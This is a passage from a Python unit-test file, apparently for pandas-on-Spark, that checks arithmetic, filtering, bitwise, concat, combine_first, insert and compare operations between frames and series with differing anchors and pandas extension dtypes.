        self.assert_eq(
            (ps.range(10) + ps.range(10)).sort_index(),
            (
                ps.DataFrame({"id": list(range(10))}) + ps.DataFrame({"id": list(range(10))})
            ).sort_index(),
        )
    def test_no_matched_index(self):
        """Combining frames whose index names differ must raise ValueError."""
        with self.assertRaisesRegex(ValueError, "Index names must be exactly matched"):
            ps.DataFrame({"a": [1, 2, 3]}).set_index("a") + ps.DataFrame(
                {"b": [1, 2, 3]}
            ).set_index("b")
    def test_arithmetic(self):
        """Basic frame/series arithmetic across different anchors with plain dtypes."""
        self._test_arithmetic_frame(self.pdf1, self.pdf2, check_extension=False)
        self._test_arithmetic_series(self.pser1, self.pser2, check_extension=False)
    @unittest.skipIf(not extension_dtypes_available, "pandas extension dtypes are not available")
    def test_arithmetic_extension_dtypes(self):
        """Same arithmetic checks using the nullable Int64 extension dtype."""
        self._test_arithmetic_frame(
            self.pdf1.astype("Int64"), self.pdf2.astype("Int64"), check_extension=True
        )
        self._test_arithmetic_series(
            # truncate the float values to int before converting to nullable Int64
            self.pser1.astype(int).astype("Int64"),
            self.pser2.astype(int).astype("Int64"),
            check_extension=True,
        )
    @unittest.skipIf(
        not extension_float_dtypes_available, "pandas extension float dtypes are not available"
    )
    def test_arithmetic_extension_float_dtypes(self):
        """Same arithmetic checks using the nullable Float64 extension dtype."""
        self._test_arithmetic_frame(
            self.pdf1.astype("Float64"), self.pdf2.astype("Float64"), check_extension=True
        )
        self._test_arithmetic_series(
            self.pser1.astype("Float64"), self.pser2.astype("Float64"), check_extension=True
        )
    def _test_arithmetic_frame(self, pdf1, pdf2, *, check_extension):
        """Check +, -, *, / between columns/frames anchored to different DataFrames.

        With `check_extension`, also assert the results keep a pandas extension
        dtype; exact-value comparison is relaxed on pandas [1.1, 1.2.2).
        """
        psdf1 = ps.from_pandas(pdf1)
        psdf2 = ps.from_pandas(pdf2)
        def assert_eq(actual, expected):
            # On pandas [1.1, 1.2.2) compare non-exactly and additionally check
            # that extension dtypes are preserved; otherwise compare exactly.
            if LooseVersion("1.1") <= LooseVersion(pd.__version__) < LooseVersion("1.2.2"):
                self.assert_eq(actual, expected, check_exact=not check_extension)
                if check_extension:
                    if isinstance(actual, DataFrame):
                        for dtype in actual.dtypes:
                            self.assertTrue(isinstance(dtype, extension_dtypes))
                    else:
                        self.assertTrue(isinstance(actual.dtype, extension_dtypes))
            else:
                self.assert_eq(actual, expected)
        # Series
        assert_eq((psdf1.a - psdf2.b).sort_index(), (pdf1.a - pdf2.b).sort_index())
        assert_eq((psdf1.a * psdf2.a).sort_index(), (pdf1.a * pdf2.a).sort_index())
        if check_extension and not extension_float_dtypes_available:
            # division produces floats, so the extension-dtype check is skipped
            self.assert_eq(
                (psdf1["a"] / psdf2["a"]).sort_index(), (pdf1["a"] / pdf2["a"]).sort_index()
            )
        else:
            assert_eq((psdf1["a"] / psdf2["a"]).sort_index(), (pdf1["a"] / pdf2["a"]).sort_index())
        # DataFrame
        assert_eq((psdf1 + psdf2).sort_index(), (pdf1 + pdf2).sort_index())
        # Multi-index columns
        columns = pd.MultiIndex.from_tuples([("x", "a"), ("x", "b")])
        psdf1.columns = columns
        psdf2.columns = columns
        pdf1.columns = columns
        pdf2.columns = columns
        # Series
        assert_eq(
            (psdf1[("x", "a")] - psdf2[("x", "b")]).sort_index(),
            (pdf1[("x", "a")] - pdf2[("x", "b")]).sort_index(),
        )
        assert_eq(
            (psdf1[("x", "a")] - psdf2["x"]["b"]).sort_index(),
            (pdf1[("x", "a")] - pdf2["x"]["b"]).sort_index(),
        )
        assert_eq(
            (psdf1["x"]["a"] - psdf2[("x", "b")]).sort_index(),
            (pdf1["x"]["a"] - pdf2[("x", "b")]).sort_index(),
        )
        # DataFrame
        assert_eq((psdf1 + psdf2).sort_index(), (pdf1 + pdf2).sort_index())
    def _test_arithmetic_series(self, pser1, pser2, *, check_extension):
        """Check +, -, *, / between two MultiIndex Series anchored to different frames."""
        psser1 = ps.from_pandas(pser1)
        psser2 = ps.from_pandas(pser2)
        def assert_eq(actual, expected):
            # See _test_arithmetic_frame: relaxed comparison on pandas [1.1, 1.2.2).
            if LooseVersion("1.1") <= LooseVersion(pd.__version__) < LooseVersion("1.2.2"):
                self.assert_eq(actual, expected, check_exact=not check_extension)
                if check_extension:
                    self.assertTrue(isinstance(actual.dtype, extension_dtypes))
            else:
                self.assert_eq(actual, expected)
        # MultiIndex Series
        assert_eq((psser1 + psser2).sort_index(), (pser1 + pser2).sort_index())
        assert_eq((psser1 - psser2).sort_index(), (pser1 - pser2).sort_index())
        assert_eq((psser1 * psser2).sort_index(), (pser1 * pser2).sort_index())
        if check_extension and not extension_float_dtypes_available:
            # division produces floats, so the extension-dtype check is skipped
            self.assert_eq((psser1 / psser2).sort_index(), (pser1 / pser2).sort_index())
        else:
            assert_eq((psser1 / psser2).sort_index(), (pser1 / pser2).sort_index())
    def test_arithmetic_chain(self):
        """Chained arithmetic across three frames/series with plain dtypes."""
        self._test_arithmetic_chain_frame(self.pdf1, self.pdf2, self.pdf3, check_extension=False)
        self._test_arithmetic_chain_series(
            self.pser1, self.pser2, self.pser3, check_extension=False
        )
    @unittest.skipIf(not extension_dtypes_available, "pandas extension dtypes are not available")
    def test_arithmetic_chain_extension_dtypes(self):
        """Chained arithmetic using the nullable Int64 extension dtype."""
        self._test_arithmetic_chain_frame(
            self.pdf1.astype("Int64"),
            self.pdf2.astype("Int64"),
            self.pdf3.astype("Int64"),
            check_extension=True,
        )
        self._test_arithmetic_chain_series(
            # truncate the float values to int before converting to nullable Int64
            self.pser1.astype(int).astype("Int64"),
            self.pser2.astype(int).astype("Int64"),
            self.pser3.astype(int).astype("Int64"),
            check_extension=True,
        )
    @unittest.skipIf(
        not extension_float_dtypes_available, "pandas extension float dtypes are not available"
    )
    def test_arithmetic_chain_extension_float_dtypes(self):
        """Chained arithmetic using the nullable Float64 extension dtype."""
        self._test_arithmetic_chain_frame(
            self.pdf1.astype("Float64"),
            self.pdf2.astype("Float64"),
            self.pdf3.astype("Float64"),
            check_extension=True,
        )
        self._test_arithmetic_chain_series(
            self.pser1.astype("Float64"),
            self.pser2.astype("Float64"),
            self.pser3.astype("Float64"),
            check_extension=True,
        )
    def _test_arithmetic_chain_frame(self, pdf1, pdf2, pdf3, *, check_extension):
        """Check chained arithmetic across three frames anchored to different DataFrames.

        Only columns common to all three frames are expected to keep an
        extension dtype when `check_extension` is set.
        """
        psdf1 = ps.from_pandas(pdf1)
        psdf2 = ps.from_pandas(pdf2)
        psdf3 = ps.from_pandas(pdf3)
        common_columns = set(psdf1.columns).intersection(psdf2.columns).intersection(psdf3.columns)
        def assert_eq(actual, expected):
            # On pandas [1.1, 1.2.2) compare non-exactly; with check_extension,
            # common columns must keep an extension dtype, others must not.
            if LooseVersion("1.1") <= LooseVersion(pd.__version__) < LooseVersion("1.2.2"):
                self.assert_eq(actual, expected, check_exact=not check_extension)
                if check_extension:
                    if isinstance(actual, DataFrame):
                        for column, dtype in zip(actual.columns, actual.dtypes):
                            if column in common_columns:
                                self.assertTrue(isinstance(dtype, extension_dtypes))
                            else:
                                self.assertFalse(isinstance(dtype, extension_dtypes))
                    else:
                        self.assertTrue(isinstance(actual.dtype, extension_dtypes))
            else:
                self.assert_eq(actual, expected)
        # Series
        assert_eq(
            (psdf1.a - psdf2.b - psdf3.c).sort_index(), (pdf1.a - pdf2.b - pdf3.c).sort_index()
        )
        assert_eq(
            (psdf1.a * (psdf2.a * psdf3.c)).sort_index(), (pdf1.a * (pdf2.a * pdf3.c)).sort_index()
        )
        if check_extension and not extension_float_dtypes_available:
            # division produces floats, so the extension-dtype check is skipped
            self.assert_eq(
                (psdf1["a"] / psdf2["a"] / psdf3["c"]).sort_index(),
                (pdf1["a"] / pdf2["a"] / pdf3["c"]).sort_index(),
            )
        else:
            assert_eq(
                (psdf1["a"] / psdf2["a"] / psdf3["c"]).sort_index(),
                (pdf1["a"] / pdf2["a"] / pdf3["c"]).sort_index(),
            )
        # DataFrame
        if check_extension and (
            LooseVersion("1.0") <= LooseVersion(pd.__version__) < LooseVersion("1.1")
        ):
            # pandas [1.0, 1.1) needs an approximate comparison here
            self.assert_eq(
                (psdf1 + psdf2 - psdf3).sort_index(), (pdf1 + pdf2 - pdf3).sort_index(), almost=True
            )
        else:
            assert_eq((psdf1 + psdf2 - psdf3).sort_index(), (pdf1 + pdf2 - pdf3).sort_index())
        # Multi-index columns
        columns = pd.MultiIndex.from_tuples([("x", "a"), ("x", "b")])
        psdf1.columns = columns
        psdf2.columns = columns
        pdf1.columns = columns
        pdf2.columns = columns
        columns = pd.MultiIndex.from_tuples([("x", "b"), ("y", "c")])
        psdf3.columns = columns
        pdf3.columns = columns
        common_columns = set(psdf1.columns).intersection(psdf2.columns).intersection(psdf3.columns)
        # Series
        assert_eq(
            (psdf1[("x", "a")] - psdf2[("x", "b")] - psdf3[("y", "c")]).sort_index(),
            (pdf1[("x", "a")] - pdf2[("x", "b")] - pdf3[("y", "c")]).sort_index(),
        )
        assert_eq(
            (psdf1[("x", "a")] * (psdf2[("x", "b")] * psdf3[("y", "c")])).sort_index(),
            (pdf1[("x", "a")] * (pdf2[("x", "b")] * pdf3[("y", "c")])).sort_index(),
        )
        # DataFrame
        if check_extension and (
            LooseVersion("1.0") <= LooseVersion(pd.__version__) < LooseVersion("1.1")
        ):
            self.assert_eq(
                (psdf1 + psdf2 - psdf3).sort_index(), (pdf1 + pdf2 - pdf3).sort_index(), almost=True
            )
        else:
            assert_eq((psdf1 + psdf2 - psdf3).sort_index(), (pdf1 + pdf2 - pdf3).sort_index())
    def _test_arithmetic_chain_series(self, pser1, pser2, pser3, *, check_extension):
        """Check chained arithmetic across three MultiIndex Series on different anchors."""
        psser1 = ps.from_pandas(pser1)
        psser2 = ps.from_pandas(pser2)
        psser3 = ps.from_pandas(pser3)
        def assert_eq(actual, expected):
            # See _test_arithmetic_frame: relaxed comparison on pandas [1.1, 1.2.2).
            if LooseVersion("1.1") <= LooseVersion(pd.__version__) < LooseVersion("1.2.2"):
                self.assert_eq(actual, expected, check_exact=not check_extension)
                if check_extension:
                    self.assertTrue(isinstance(actual.dtype, extension_dtypes))
            else:
                self.assert_eq(actual, expected)
        # MultiIndex Series
        assert_eq((psser1 + psser2 - psser3).sort_index(), (pser1 + pser2 - pser3).sort_index())
        assert_eq((psser1 * psser2 * psser3).sort_index(), (pser1 * pser2 * pser3).sort_index())
        if check_extension and not extension_float_dtypes_available:
            if LooseVersion(pd.__version__) >= LooseVersion("1.0"):
                self.assert_eq(
                    (psser1 - psser2 / psser3).sort_index(), (pser1 - pser2 / pser3).sort_index()
                )
            else:
                # pandas < 1.0 disagrees here, so compare against a hard-coded result
                expected = pd.Series(
                    [249.0, np.nan, 0.0, 0.88, np.nan, np.nan, np.nan, np.nan, np.nan, -np.inf]
                    + [np.nan, np.nan, np.nan, np.nan, np.nan, np.nan, np.nan],
                    index=pd.MultiIndex(
                        [
                            ["cow", "falcon", "koala", "koalas", "lama"],
                            ["length", "power", "speed", "weight"],
                        ],
                        [
                            [0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 2, 3, 3, 3, 4, 4, 4],
                            [0, 1, 2, 2, 3, 0, 0, 1, 2, 3, 0, 0, 3, 3, 0, 2, 3],
                        ],
                    ),
                )
                self.assert_eq((psser1 - psser2 / psser3).sort_index(), expected)
        else:
            assert_eq((psser1 - psser2 / psser3).sort_index(), (pser1 - pser2 / pser3).sort_index())
        assert_eq((psser1 + psser2 * psser3).sort_index(), (pser1 + pser2 * pser3).sort_index())
    def test_mod(self):
        """`Series.mod` against a Series anchored to a different DataFrame."""
        pser = pd.Series([100, None, -300, None, 500, -700])
        pser_other = pd.Series([-150] * 6)
        psser = ps.from_pandas(pser)
        psser_other = ps.from_pandas(pser_other)
        # NOTE(review): the identical assertion is run three times — presumably to
        # check repeated evaluation is stable; confirm before deduplicating.
        self.assert_eq(psser.mod(psser_other).sort_index(), pser.mod(pser_other))
        self.assert_eq(psser.mod(psser_other).sort_index(), pser.mod(pser_other))
        self.assert_eq(psser.mod(psser_other).sort_index(), pser.mod(pser_other))
    def test_rmod(self):
        """`Series.rmod` against a Series anchored to a different DataFrame."""
        pser = pd.Series([100, None, -300, None, 500, -700])
        pser_other = pd.Series([-150] * 6)
        psser = ps.from_pandas(pser)
        psser_other = ps.from_pandas(pser_other)
        # NOTE(review): repeated three times, mirroring test_mod; confirm intent.
        self.assert_eq(psser.rmod(psser_other).sort_index(), pser.rmod(pser_other))
        self.assert_eq(psser.rmod(psser_other).sort_index(), pser.rmod(pser_other))
        self.assert_eq(psser.rmod(psser_other).sort_index(), pser.rmod(pser_other))
    def test_getitem_boolean_series(self):
        """Filtering a frame/series with a boolean Series from another frame (`[]`)."""
        pdf1 = pd.DataFrame(
            {"A": [0, 1, 2, 3, 4], "B": [100, 200, 300, 400, 500]}, index=[20, 10, 30, 0, 50]
        )
        # note: same labels as pdf1 but in a different order
        pdf2 = pd.DataFrame(
            {"A": [0, -1, -2, -3, -4], "B": [-100, -200, -300, -400, -500]},
            index=[0, 30, 10, 20, 50],
        )
        psdf1 = ps.from_pandas(pdf1)
        psdf2 = ps.from_pandas(pdf2)
        self.assert_eq(pdf1[pdf2.A > -3].sort_index(), psdf1[psdf2.A > -3].sort_index())
        self.assert_eq(pdf1.A[pdf2.A > -3].sort_index(), psdf1.A[psdf2.A > -3].sort_index())
        self.assert_eq(
            (pdf1.A + 1)[pdf2.A > -3].sort_index(), (psdf1.A + 1)[psdf2.A > -3].sort_index()
        )
    def test_loc_getitem_boolean_series(self):
        """Filtering a frame/series with a boolean Series from another frame (`.loc`)."""
        pdf1 = pd.DataFrame(
            {"A": [0, 1, 2, 3, 4], "B": [100, 200, 300, 400, 500]}, index=[20, 10, 30, 0, 50]
        )
        pdf2 = pd.DataFrame(
            {"A": [0, -1, -2, -3, -4], "B": [-100, -200, -300, -400, -500]},
            index=[20, 10, 30, 0, 50],
        )
        psdf1 = ps.from_pandas(pdf1)
        psdf2 = ps.from_pandas(pdf2)
        self.assert_eq(pdf1.loc[pdf2.A > -3].sort_index(), psdf1.loc[psdf2.A > -3].sort_index())
        self.assert_eq(pdf1.A.loc[pdf2.A > -3].sort_index(), psdf1.A.loc[psdf2.A > -3].sort_index())
        self.assert_eq(
            (pdf1.A + 1).loc[pdf2.A > -3].sort_index(), (psdf1.A + 1).loc[psdf2.A > -3].sort_index()
        )
    def test_bitwise(self):
        """`|` and `&` between boolean Series on different anchors, with NaNs."""
        pser1 = pd.Series([True, False, True, False, np.nan, np.nan, True, False, np.nan])
        pser2 = pd.Series([True, False, False, True, True, False, np.nan, np.nan, np.nan])
        psser1 = ps.from_pandas(pser1)
        psser2 = ps.from_pandas(pser2)
        self.assert_eq(pser1 | pser2, (psser1 | psser2).sort_index())
        self.assert_eq(pser1 & pser2, (psser1 & psser2).sort_index())
        # completely disjoint indexes
        pser1 = pd.Series([True, False, np.nan], index=list("ABC"))
        pser2 = pd.Series([False, True, np.nan], index=list("DEF"))
        psser1 = ps.from_pandas(pser1)
        psser2 = ps.from_pandas(pser2)
        self.assert_eq(pser1 | pser2, (psser1 | psser2).sort_index())
        self.assert_eq(pser1 & pser2, (psser1 & psser2).sort_index())
    @unittest.skipIf(
        not extension_object_dtypes_available, "pandas extension object dtypes are not available"
    )
    def test_bitwise_extension_dtype(self):
        """`|` and `&` on nullable "boolean"-dtype Series across different anchors."""
        def assert_eq(actual, expected):
            # On pandas [1.1, 1.2.2) compare non-exactly and verify the result
            # keeps an extension dtype.
            if LooseVersion("1.1") <= LooseVersion(pd.__version__) < LooseVersion("1.2.2"):
                self.assert_eq(actual, expected, check_exact=False)
                self.assertTrue(isinstance(actual.dtype, extension_dtypes))
            else:
                self.assert_eq(actual, expected)
        pser1 = pd.Series(
            [True, False, True, False, np.nan, np.nan, True, False, np.nan], dtype="boolean"
        )
        pser2 = pd.Series(
            [True, False, False, True, True, False, np.nan, np.nan, np.nan], dtype="boolean"
        )
        psser1 = ps.from_pandas(pser1)
        psser2 = ps.from_pandas(pser2)
        assert_eq((psser1 | psser2).sort_index(), pser1 | pser2)
        assert_eq((psser1 & psser2).sort_index(), pser1 & pser2)
        # completely disjoint indexes
        pser1 = pd.Series([True, False, np.nan], index=list("ABC"), dtype="boolean")
        pser2 = pd.Series([False, True, np.nan], index=list("DEF"), dtype="boolean")
        psser1 = ps.from_pandas(pser1)
        psser2 = ps.from_pandas(pser2)
        # pandas appears to give unexpected results here (possibly a pandas bug),
        # so compare against explicitly constructed expected values instead:
        # assert_eq((psser1 | psser2).sort_index(), pser1 | pser2)
        # assert_eq((psser1 & psser2).sort_index(), pser1 & pser2)
        assert_eq(
            (psser1 | psser2).sort_index(),
            pd.Series([True, None, None, None, True, None], index=list("ABCDEF"), dtype="boolean"),
        )
        assert_eq(
            (psser1 & psser2).sort_index(),
            pd.Series(
                [None, False, None, False, None, None], index=list("ABCDEF"), dtype="boolean"
            ),
        )
    def test_concat_column_axis(self):
        """`ps.concat(axis=1)` over frames/series with different anchors and joins."""
        pdf1 = pd.DataFrame({"A": [0, 2, 4], "B": [1, 3, 5]}, index=[1, 2, 3])
        pdf1.columns.names = ["AB"]
        pdf2 = pd.DataFrame({"C": [1, 2, 3], "D": [4, 5, 6]}, index=[1, 3, 5])
        pdf2.columns.names = ["CD"]
        psdf1 = ps.from_pandas(pdf1)
        psdf2 = ps.from_pandas(pdf2)
        # copies with MultiIndex columns
        psdf3 = psdf1.copy()
        psdf4 = psdf2.copy()
        pdf3 = pdf1.copy()
        pdf4 = pdf2.copy()
        columns = pd.MultiIndex.from_tuples([("X", "A"), ("X", "B")], names=["X", "AB"])
        pdf3.columns = columns
        psdf3.columns = columns
        columns = pd.MultiIndex.from_tuples([("X", "C"), ("X", "D")], names=["Y", "CD"])
        pdf4.columns = columns
        psdf4.columns = columns
        pdf5 = pd.DataFrame({"A": [0, 2, 4], "B": [1, 3, 5]}, index=[1, 2, 3])
        pdf6 = pd.DataFrame({"C": [1, 2, 3]}, index=[1, 3, 5])
        psdf5 = ps.from_pandas(pdf5)
        psdf6 = ps.from_pandas(pdf6)
        ignore_indexes = [True, False]
        joins = ["inner", "outer"]
        objs = [
            ([psdf1.A, psdf2.C], [pdf1.A, pdf2.C]),
            # TODO: ([psdf1, psdf2.C], [pdf1, pdf2.C]),
            ([psdf1.A, psdf2], [pdf1.A, pdf2]),
            ([psdf1.A, psdf2.C], [pdf1.A, pdf2.C]),
            ([psdf3[("X", "A")], psdf4[("X", "C")]], [pdf3[("X", "A")], pdf4[("X", "C")]]),
            ([psdf3, psdf4[("X", "C")]], [pdf3, pdf4[("X", "C")]]),
            ([psdf3[("X", "A")], psdf4], [pdf3[("X", "A")], pdf4]),
            ([psdf3, psdf4], [pdf3, pdf4]),
            ([psdf5, psdf6], [pdf5, pdf6]),
            ([psdf6, psdf5], [pdf6, pdf5]),
        ]
        for ignore_index, join in product(ignore_indexes, joins):
            for i, (psdfs, pdfs) in enumerate(objs):
                with self.subTest(ignore_index=ignore_index, join=join, pdfs=pdfs, pair=i):
                    actual = ps.concat(psdfs, axis=1, ignore_index=ignore_index, join=join)
                    expected = pd.concat(pdfs, axis=1, ignore_index=ignore_index, join=join)
                    # compare via repr after normalizing row order/index
                    self.assert_eq(
                        repr(actual.sort_values(list(actual.columns)).reset_index(drop=True)),
                        repr(expected.sort_values(list(expected.columns)).reset_index(drop=True)),
                    )
    def test_combine_first(self):
        """`combine_first` for Series (flat and MultiIndex) and DataFrames."""
        pser1 = pd.Series({"falcon": 330.0, "eagle": 160.0})
        pser2 = pd.Series({"falcon": 345.0, "eagle": 200.0, "duck": 30.0})
        psser1 = ps.from_pandas(pser1)
        psser2 = ps.from_pandas(pser2)
        self.assert_eq(
            psser1.combine_first(psser2).sort_index(), pser1.combine_first(pser2).sort_index()
        )
        # non-Series argument is rejected
        with self.assertRaisesRegex(
            TypeError, "`combine_first` only allows `Series` for parameter `other`"
        ):
            psser1.combine_first(50)
        # tuple (multi-level) Series names
        psser1.name = ("X", "A")
        psser2.name = ("Y", "B")
        pser1.name = ("X", "A")
        pser2.name = ("Y", "B")
        self.assert_eq(
            psser1.combine_first(psser2).sort_index(), pser1.combine_first(pser2).sort_index()
        )
        # MultiIndex
        midx1 = pd.MultiIndex(
            [["lama", "cow", "falcon", "koala"], ["speed", "weight", "length", "power"]],
            [[0, 3, 1, 1, 1, 2, 2, 2], [0, 2, 0, 3, 2, 0, 1, 3]],
        )
        midx2 = pd.MultiIndex(
            [["lama", "cow", "falcon"], ["speed", "weight", "length"]],
            [[0, 0, 0, 1, 1, 1, 2, 2, 2], [0, 1, 2, 0, 1, 2, 0, 1, 2]],
        )
        pser1 = pd.Series([45, 200, 1.2, 30, 250, 1.5, 320, 1], index=midx1)
        pser2 = pd.Series([-45, 200, -1.2, 30, -250, 1.5, 320, 1, -0.3], index=midx2)
        psser1 = ps.from_pandas(pser1)
        psser2 = ps.from_pandas(pser2)
        self.assert_eq(
            psser1.combine_first(psser2).sort_index(), pser1.combine_first(pser2).sort_index()
        )
        # DataFrame
        pdf1 = pd.DataFrame({"A": [None, 0], "B": [4, None]})
        psdf1 = ps.from_pandas(pdf1)
        pdf2 = pd.DataFrame({"C": [3, 3], "B": [1, 1]})
        psdf2 = ps.from_pandas(pdf2)
        if LooseVersion(pd.__version__) >= LooseVersion("1.2.0"):
            self.assert_eq(pdf1.combine_first(pdf2), psdf1.combine_first(psdf2).sort_index())
        else:
            # pandas < 1.2.0 returns unexpected dtypes,
            # please refer to https://github.com/pandas-dev/pandas/issues/28481 for details
            expected_pdf = pd.DataFrame({"A": [None, 0], "B": [4.0, 1.0], "C": [3, 3]})
            self.assert_eq(expected_pdf, psdf1.combine_first(psdf2).sort_index())
        # MultiIndex columns
        pdf1.columns = pd.MultiIndex.from_tuples([("A", "willow"), ("B", "pine")])
        psdf1 = ps.from_pandas(pdf1)
        pdf2.columns = pd.MultiIndex.from_tuples([("C", "oak"), ("B", "pine")])
        psdf2 = ps.from_pandas(pdf2)
        if LooseVersion(pd.__version__) >= LooseVersion("1.2.0"):
            self.assert_eq(pdf1.combine_first(pdf2), psdf1.combine_first(psdf2).sort_index())
        else:
            # pandas < 1.2.0 returns unexpected dtypes,
            # please refer to https://github.com/pandas-dev/pandas/issues/28481 for details
            expected_pdf = pd.DataFrame({"A": [None, 0], "B": [4.0, 1.0], "C": [3, 3]})
            expected_pdf.columns = pd.MultiIndex.from_tuples(
                [("A", "willow"), ("B", "pine"), ("C", "oak")]
            )
            self.assert_eq(expected_pdf, psdf1.combine_first(psdf2).sort_index())
    def test_insert(self):
        """`DataFrame.insert` of a Series anchored to a different DataFrame."""
        #
        # Basic DataFrame
        #
        pdf = pd.DataFrame([1, 2, 3])
        psdf = ps.from_pandas(pdf)
        pser = pd.Series([4, 5, 6])
        psser = ps.from_pandas(pser)
        psdf.insert(1, "y", psser)
        pdf.insert(1, "y", pser)
        self.assert_eq(psdf.sort_index(), pdf.sort_index())
        #
        # DataFrame with Index different from inserting Series'
        #
        pdf = pd.DataFrame([1, 2, 3], index=[10, 20, 30])
        psdf = ps.from_pandas(pdf)
        pser = pd.Series([4, 5, 6])
        psser = ps.from_pandas(pser)
        psdf.insert(1, "y", psser)
        pdf.insert(1, "y", pser)
        self.assert_eq(psdf.sort_index(), pdf.sort_index())
        #
        # DataFrame with Multi-index columns
        #
        # NOTE(review): these pdf/psdf are immediately overwritten below without
        # being used — dead code or a lost assertion? confirm before removing.
        pdf = pd.DataFrame({("x", "a"): [1, 2, 3]})
        psdf = ps.from_pandas(pdf)
        pser = pd.Series([4, 5, 6])
        psser = ps.from_pandas(pser)
        pdf = pd.DataFrame({("x", "a", "b"): [1, 2, 3]})
        psdf = ps.from_pandas(pdf)
        psdf.insert(0, "a", psser)
        pdf.insert(0, "a", pser)
        self.assert_eq(psdf.sort_index(), pdf.sort_index())
        psdf.insert(0, ("b", "c", ""), psser)
        pdf.insert(0, ("b", "c", ""), pser)
        self.assert_eq(psdf.sort_index(), pdf.sort_index())
    def test_compare(self):
        """`Series.compare` across anchors.

        On pandas >= 1.1 results are compared against pandas directly; on older
        pandas (which lacks `Series.compare`) they are compared against
        hard-coded expected frames. Mismatched indexes must raise ValueError.
        """
        if LooseVersion(pd.__version__) >= LooseVersion("1.1"):
            pser1 = pd.Series(["b", "c", np.nan, "g", np.nan])
            pser2 = pd.Series(["a", "c", np.nan, np.nan, "h"])
            psser1 = ps.from_pandas(pser1)
            psser2 = ps.from_pandas(pser2)
            self.assert_eq(
                pser1.compare(pser2).sort_index(),
                psser1.compare(psser2).sort_index(),
            )
            # `keep_shape=True`
            self.assert_eq(
                pser1.compare(pser2, keep_shape=True).sort_index(),
                psser1.compare(psser2, keep_shape=True).sort_index(),
            )
            # `keep_equal=True`
            self.assert_eq(
                pser1.compare(pser2, keep_equal=True).sort_index(),
                psser1.compare(psser2, keep_equal=True).sort_index(),
            )
            # `keep_shape=True` and `keep_equal=True`
            self.assert_eq(
                pser1.compare(pser2, keep_shape=True, keep_equal=True).sort_index(),
                psser1.compare(psser2, keep_shape=True, keep_equal=True).sort_index(),
            )
            # MultiIndex
            pser1.index = pd.MultiIndex.from_tuples(
                [("a", "x"), ("b", "y"), ("c", "z"), ("x", "k"), ("q", "l")]
            )
            pser2.index = pd.MultiIndex.from_tuples(
                [("a", "x"), ("b", "y"), ("c", "z"), ("x", "k"), ("q", "l")]
            )
            psser1 = ps.from_pandas(pser1)
            psser2 = ps.from_pandas(pser2)
            self.assert_eq(
                pser1.compare(pser2).sort_index(),
                psser1.compare(psser2).sort_index(),
            )
            # `keep_shape=True` with MultiIndex
            self.assert_eq(
                pser1.compare(pser2, keep_shape=True).sort_index(),
                psser1.compare(psser2, keep_shape=True).sort_index(),
            )
            # `keep_equal=True` with MultiIndex
            self.assert_eq(
                pser1.compare(pser2, keep_equal=True).sort_index(),
                psser1.compare(psser2, keep_equal=True).sort_index(),
            )
            # `keep_shape=True` and `keep_equal=True` with MultiIndex
            self.assert_eq(
                pser1.compare(pser2, keep_shape=True, keep_equal=True).sort_index(),
                psser1.compare(psser2, keep_shape=True, keep_equal=True).sort_index(),
            )
        else:
            psser1 = ps.Series(["b", "c", np.nan, "g", np.nan])
            psser2 = ps.Series(["a", "c", np.nan, np.nan, "h"])
            expected = ps.DataFrame(
                [["b", "a"], ["g", None], [None, "h"]], index=[0, 3, 4], columns=["self", "other"]
            )
            self.assert_eq(expected, psser1.compare(psser2).sort_index())
            # `keep_shape=True`
            expected = ps.DataFrame(
                [["b", "a"], [None, None], [None, None], ["g", None], [None, "h"]],
                index=[0, 1, 2, 3, 4],
                columns=["self", "other"],
            )
            self.assert_eq(
                expected,
                psser1.compare(psser2, keep_shape=True).sort_index(),
            )
            # `keep_equal=True`
            expected = ps.DataFrame(
                [["b", "a"], ["g", None], [None, "h"]], index=[0, 3, 4], columns=["self", "other"]
            )
            self.assert_eq(
                expected,
                psser1.compare(psser2, keep_equal=True).sort_index(),
            )
            # `keep_shape=True` and `keep_equal=True`
            expected = ps.DataFrame(
                [["b", "a"], ["c", "c"], [None, None], ["g", None], [None, "h"]],
                index=[0, 1, 2, 3, 4],
                columns=["self", "other"],
            )
            self.assert_eq(
                expected,
                psser1.compare(psser2, keep_shape=True, keep_equal=True).sort_index(),
            )
            # MultiIndex
            psser1 = ps.Series(
                ["b", "c", np.nan, "g", np.nan],
                index=pd.MultiIndex.from_tuples(
                    [("a", "x"), ("b", "y"), ("c", "z"), ("x", "k"), ("q", "l")]
                ),
            )
            psser2 = ps.Series(
                ["a", "c", np.nan, np.nan, "h"],
                index=pd.MultiIndex.from_tuples(
                    [("a", "x"), ("b", "y"), ("c", "z"), ("x", "k"), ("q", "l")]
                ),
            )
            expected = ps.DataFrame(
                [["b", "a"], [None, "h"], ["g", None]],
                index=pd.MultiIndex.from_tuples([("a", "x"), ("q", "l"), ("x", "k")]),
                columns=["self", "other"],
            )
            self.assert_eq(expected, psser1.compare(psser2).sort_index())
            # `keep_shape=True`
            expected = ps.DataFrame(
                [["b", "a"], [None, None], [None, None], [None, "h"], ["g", None]],
                index=pd.MultiIndex.from_tuples(
                    [("a", "x"), ("b", "y"), ("c", "z"), ("q", "l"), ("x", "k")]
                ),
                columns=["self", "other"],
            )
            self.assert_eq(
                expected,
                psser1.compare(psser2, keep_shape=True).sort_index(),
            )
            # `keep_equal=True`
            expected = ps.DataFrame(
                [["b", "a"], [None, "h"], ["g", None]],
                index=pd.MultiIndex.from_tuples([("a", "x"), ("q", "l"), ("x", "k")]),
                columns=["self", "other"],
            )
            self.assert_eq(
                expected,
                psser1.compare(psser2, keep_equal=True).sort_index(),
            )
            # `keep_shape=True` and `keep_equal=True`
            expected = ps.DataFrame(
                [["b", "a"], ["c", "c"], [None, None], [None, "h"], ["g", None]],
                index=pd.MultiIndex.from_tuples(
                    [("a", "x"), ("b", "y"), ("c", "z"), ("q", "l"), ("x", "k")]
                ),
                columns=["self", "other"],
            )
            self.assert_eq(
                expected,
                psser1.compare(psser2, keep_shape=True, keep_equal=True).sort_index(),
            )
        # Different Index
        with self.assertRaisesRegex(
            ValueError, "Can only compare identically-labeled Series objects"
        ):
            psser1 = ps.Series(
                [1, 2, 3, 4, 5],
                index=pd.Index([1, 2, 3, 4, 5]),
            )
            psser2 = ps.Series(
                [2, 2, 3, 4, 1],
                index=pd.Index([5, 4, 3, 2, 1]),
            )
            psser1.compare(psser2)
        # Different MultiIndex
        with self.assertRaisesRegex(
            ValueError, "Can only compare identically-labeled Series objects"
        ):
            psser1 = ps.Series(
                [1, 2, 3, 4, 5],
                index=pd.MultiIndex.from_tuples(
